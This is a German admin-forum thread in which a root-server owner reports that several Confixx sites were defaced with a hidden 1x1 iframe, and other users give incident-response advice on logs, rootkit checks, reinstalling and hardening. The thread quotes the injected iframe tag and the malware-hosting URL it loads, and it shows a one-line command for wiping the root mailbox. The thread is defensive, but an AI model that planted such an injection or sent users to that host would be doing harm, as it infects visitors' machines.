Rootserver geknackt?

[fun4teen]

Hi all,

folgendes:
Auf meinem Rootserver mit Suse 9.1 Confixx 3.x wurde auf mehreren confixx Accounts die index.html verändert ..

Und zwar folgendes hinzugefügt:

Code: Select all

<iframe src=http://buytraff.biz/dl/adv478.php width=1 height=1></iframe>

Dieser Link (oben) bitte nicht öffnen sonst habt ihr gleich ein trojaner und virus auf eurer kiste.

Code: Select all

Hier seht ihr die ganzen Viren und den Mist:
http://buytraff.biz/dl/ 

Nun weiß ich nicht wie das gemacht wurde.
Wie geht man am besten vor?

Ich habe nun einen Log eines der geknackten Accounts angeschaut (also der Weblog) aber nichts verdächtiges festgestellt zu dem Zeitpunkt als die Datei verändert wurde.

Welche Logs muss ich mir anschauen?
Wie geht man am besten vor?
Danke, bitte um schnellen Rat.

[Joe User]

Tja, auch Confixx und Co muss man regelmässig updaten...
http://www.rootforum.org/faq/index.php? ... artlang=de

Zur Info: Domain wurde am 20.10.2005 in Warschau registriert...

[fun4teen]

Kann ich in irgendwelchen dateien nachschauen, was auf dem Server gemacht wurde? Logs?

[wgot]

Hallo,

Kann ich in irgendwelchen dateien nachschauen, was auf dem Server gemacht wurde? Logs?

kannst Du, es gibt aber kein Logfile in dem drinsteht was an den Logfiles manipuliert wurde. :evil:

Du kannst also über die Logfiles möglicherweise den Einbruchweg nachvollziehen, aber niemals alle erfolgten Manipulationen feststellen. Folglich freut sich Dein Server auf eine baldige Neuinstallation.

Gruß, Wolfgang

[fun4teen]

So hab nun den Dreckshund.. zumindest ein stückchen davon:
es hat sich ein trojaner namens lrk5 eingeschlichen .. vermutlich über bufferoverflow..

http://www.sophos.de/virusinfo/analyses/trojlrk5a.html

Was jetzt?

[suntzu]

Was jetzt?

http://www.rootforum.org/faq/index.php? ... artlang=de

[fun4teen]

Was jetzt?

http://www.rootforum.org/faq/index.php? ... artlang=de

Ja ok.. aber dafür brauch ich Zeit (min 1. Tag)... was kann ich auf die schnelle machen?

Und vorallem .. bringt es mir nichts das system neu aufzusetzen wenn ich nicht weiß woher genau bzw. wie der Trojaner auf das system gekommen ist.

Wie kann ich das noch lokalisieren?

Danke

[Roger Wilco]

Ja ok.. aber dafür brauch ich Zeit (min 1. Tag)... was kann ich auf die schnelle machen?

Code: Select all

/sbin/shutdown -h now

Etwas weniger radikal (falls es dein Provider anbietet): Starte das Rescuesystem.

Und vorallem .. bringt es mir nichts das system neu aufzusetzen wenn ich nicht weiß woher genau bzw. wie der Trojaner auf das system gekommen ist.

Es bringt aber noch viel weniger, wenn du die komprommitierte Kiste weiter am Netz lässt.

Wie kann ich das noch lokalisieren?

Logs, IDS, Vergleich mit deinen Backups.

[fun4teen]

Hab nun noch ein checktool drüber laufen lassen..

....
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 465)
Checking `lkm'... chkproc: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... eth0: PF_PACKET(/sbin/dhcpcd)
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted
Checking `chkutmp'... chkutmp: nothing deleted
....

[suntzu]

Hab nun noch ein checktool drüber laufen lassen..

[ snip ]

Und das hat nix gefunden... Setz die Kiste neu auf, mach die sicher. Wenn du willst, kannst du dir ja vorher über das Rescue-System ein Image ziehen oder ein rsync, dann kannst du in Ruhe analysieren.

[fun4teen]

Gibt es ein Trick das ich nicht wider alle Confixx Accounts (+einstellungen) neu anlegen muss.. ?

Danke

[suntzu]

Gibt es ein Trick das ich nicht wider alle Confixx Accounts (+einstellungen) neu anlegen muss.. ?

Danke

Du spielst dein Backup wieder ein...

[fun4teen]

woher weiß ich das diese nicht auch verseucht sind?
die daten?

Also ich stell mir das nun so vor.. ich schieb alle wichtigen daten (Emails/ confixxaccounts/pages/datenbanken etc. auf den Backupserver.. mach eine reinstallation... update erstmal alles auf den neusten Stand... zieh danach das Backup vom Bakupserver.. und spiele es wieder ein...


Oder?

[wgot]

Hallo,

woher weiß ich das diese nicht auch verseucht sind?
die daten?

nur geprüfte Daten zurückspielen.

Emails/ confixxaccounts/pages/datenbanken

Die Emails würde ich einfach abholen.

Bei den Confixxusern könnte einer reingemogelt sein für den der Einbrecher die Zugangdaten hat.

Bei den Datenbanken kommt's drauf an was drin ist, möglicherweise Zugangsdaten für ein Forum und der Angreifer hat sich einen Account zugelegt.

Bei den Homepages geht's hauptsächlich um die Scripts, ein zusätzliches oder manipuliertes Script ermöglicht schnellen Wiedereinstieg nachdem die Kiste neu aufgesetzt ist. Man kann natürlich auch ein Binary in einem Homepageordner verstecken, am besten mit der Dateiendung htm oder jpg. :oops:

Selbstverständlich müssen alle Passwörter geändert werden.

Halbwegs schnell ist es nur dann erledigt, wenn man rechtzeitig ein Backup gemacht hat und nicht erst nach dem Einbruch.

Gruß, Wolfgang

[chaosad]

Halbwegs schnell ist es nur dann erledigt, wenn man rechtzeitig ein Backup gemacht hat und nicht erst nach dem Einbruch.

Selbst mit einem Backup kann man nicht genau sagen wie lange er sich schon auf dem System befindet. Das ganze ist nicht sooo einfach und ist immer mit einem Restrisiko verbunden

[fun4teen]

vorallem habe ich nun (wie soeben bemerkt) ein anderes Problem.

Jemand hat auf meinem Backupserver rumgespielt.

Ich habe jede Woche ein automatisches Backup von den wichtigsten Daten gemacht... (vor 3-4 Tagen hab ich noch kontrolliert und es waren die letzten 4 da)
Nun schau ich gerade auf den Backupserver und merke das mein Backup nicht mehr da ist..

.. Aber wenn der Angreifer natürlich die automatische Backupdatei gefunden hat, hatte er auch Zugang zum Backupserver.

Was für ein Mist.

Jetzt hab ich nur noch ein Backup auf meiner Kiste hier.. welches 1/2 Monat alt ist. Naja zum Glück ist das kein Kundenserver...sondern nur einige Webseiten von mir drauf..

Ich habe nun mir mal alle daten angeschaut welche die letzen 5 Tage verändert worden sind.. also auch Bilder etc... einfach alles.. Das sah es ganz gut aus... denke nicht das der Hacker schon länger Zugang hatte..

Die ganze Angelegenheit ist echt schwierig... vorallem da ich immer noch icht weiß wie er reingekommen ist.

[chaosad]

Wie hast du denn die Backups gemacht? Wies scheint vom root Server aus den Job zum Backup Server gestartet oder?

Am besten genau andersrum machen, somit bleibt der BackupServer unberührt.

[fun4teen]

Ich hab halt die Lösung von Purtec genommen (die im benutzerhandbuch steht) ...

Ja die daten sind auf dem angegriffenem Server..


Frage:
Denkt ihr es ist möglich mit einem Virenprogramm den Trojaner zuz löschen?
Zumindest vorläufig?

[Joe User]

Denkt ihr es ist möglich mit einem Virenprogramm den Trojaner zuz löschen?

Nein.

Zumindest vorläufig?

Nein.

[rudi]

Naja zum Glück ist das kein Kundenserver...

wiebitte?

[lord_pinhead]

Er sagt es ist zum Glück kein Kundenserver ;)

Kurz vorne weg:
Kille alle Prozesse die verdächtig erscheinen
Fahre alle Dienste zum Zweck der Prüfung runter
Checke alle Files in /etc auf Veränderungen (find, grep, etc. sollten dir helfen) ebenso mal /tmp prüfen.
Suche nach allen Dateien welche die Attribute i a und s haben, meist werden die Binarys vom Hacker dadurch geschützt.
Schau dir die Passwd genau an, sollte ein User eine Loginshell haben die von Remote kommen kann, ändere das. Ist ein User hinzugekommen, such alle Files mit seiner UID
Sichere deine Daten (auch alle logs) und veranlassen eine neuinstallation, Programme wie RKHunter könnten vielleicht noch was aufdecken, aber ich würde mich nie drauf verlassen, sah ich erst letztens wieder bei nen Freund.

Bevor du die Kiste wieder Produktiov ins Netz hängst, schau mal im Forum ein paar Thread durch wie man seine Kiste sicherer macht. Stichworte wie iptables und IDS sollten dir massenhaft treffer aufzeigen. Auch "Systemtricks" wie /tmp via tmpfs mounten (+optionen noexec, nosuid) sollten gemacht werden. Und wichtiger den je ist ein eigener Kernel aufs System werfen, am besten mit GRSec und PAX (google is hier wieder dein Freund ;) ) , dann sind die Chancen etwas geringer das ein Kernelrootkit installiert werden kann, wenn der Kernel ohne Module (monolitischer Kernel) kommt ist es eigentlich unmöglich.

Ist erstmal ne Grundlage geschaffen für ein sauberes System, kannst dir auch sicher sein das du als schweres Ziel nicht so schnell Opfer von Bots und Scriptkiddies wirst.

Aso, bevor ich es vergesse. Was hat der Typ bei dir eigentlich genau gemacht? Nur eine Seite verlinken ist schon etwas eigenartig, schau mal in dein root-Postfach ob er gespammt hat.

[fun4teen]

@Lord_Pinhead
Danke für die ausführliche erklärung/beschreibung.

Ja er hat nur alle index seiten verändert -bzw. was ich bis jetzt herausgefunden habe.
+ die Daten auf dem Backupspace gelöscht.

Das Rootpostfach ist leer ;)

[Joe User]

Das Rootpostfach ist leer ;)

Code: Select all

>/var/mail/root

Beherscht jedes Scriptkiddie...

[fun4teen]

Das Rootpostfach ist leer ;)

Code: Select all

>/var/mail/root

Beherscht jedes Scriptkiddie...

Das Postfach ist leer!
Wenn bei einer Datei dransteht wann sie zuletzt geändert wurde...lässt sich das irgendwie manipulieren?

THX

[aubergine]

Wenn ich mich auf dem vermeintlich gehackten Server der .biz Domain, so umschaue vorallem den Ordner IP's, dann würd ich hier nicht mehr von Script Kiddies reden...